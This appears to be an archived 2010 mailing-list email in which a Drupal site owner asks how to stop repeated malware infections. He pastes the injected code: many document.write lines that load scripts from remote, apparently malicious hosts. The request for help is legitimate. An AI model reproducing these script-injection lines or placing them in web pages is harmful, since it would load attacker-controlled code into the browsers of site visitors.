This is the malware code which <br><br>document.write('<script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> ><\/script>');<br>document.write('<script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> ><\/script>');<br>document.write('<script src=<a href="http://heightsevents.com/_private/header-1.php">http://heightsevents.com/_private/header-1.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> ><\/script>');<br>document.write('<script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> ><\/script>');<br>document.write('<script src=<a href="http://pause-gallery.freehostia.com/themes/thumbnails.php">http://pause-gallery.freehostia.com/themes/thumbnails.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://emirersoy.com/images/EmirErsoy.php">http://emirersoy.com/images/EmirErsoy.php</a> ><\/script>');<br>document.write('<script src=<a href="http://emirersoy.com/images/EmirErsoy.php">http://emirersoy.com/images/EmirErsoy.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://emirersoy.com/images/EmirErsoy.php">http://emirersoy.com/images/EmirErsoy.php</a> ><\/script>');<br>document.write('<script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> ><\/script>');<br>document.write('<script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> ><\/script>');<br>document.write('<script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php">http://52093963.de.strato-hosting.eu/ueberuns/kontakt.php</a> ><\/script>');<br>document.write('<script src=<a href="http://acta-endo.ro/imagini/.img.php">http://acta-endo.ro/imagini/.img.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> ><\/script>');<br>document.write('<script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> ><\/script>');<br>document.write('<script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://apsex.ru/java_er/desc/l4n3/8.gif.php">http://apsex.ru/java_er/desc/l4n3/8.gif.php</a> ><\/script>');<br>document.write('<script src=<a href="http://jobstt.co.cc/wp-admin/postinblogr.php">http://jobstt.co.cc/wp-admin/postinblogr.php</a> ><\/script>');<br>
document.write('<script src=<a href="http://metalfiltre.com/fckeditor/indexz.php">http://metalfiltre.com/fckeditor/indexz.php</a> ><\/script>');<br><br><br><div class="gmail_quote">On Tue, Apr 20, 2010 at 10:59 AM, sushyl <span dir="ltr"><<a href="mailto:sushyl@gmail.com">sushyl@gmail.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">HI,<br>I am having malware problems with all my drupal sites. A piece of code gets inserted in all or some javascript(.js) files. Its happening even to the files with permissions "644". I have to remove the code and submit the siteĀ for review on webmaster tools on google, so that mozilla-firefox does not give malware. It takes 2-3 days. This is happening again and again, and i have to repeat same process each time. Is there any permanent solution for this issue?<br>
<br>I am giving the code that gets into the files. Sometimes the links in that code are different.<br><br>Thanks<br><font color="#888888">--<br>Sushil Hanwate<br>
</font></blockquote></div><br><br clear="all"><br>-- <br>Regards<br><br>Sushil Hanwate.<br>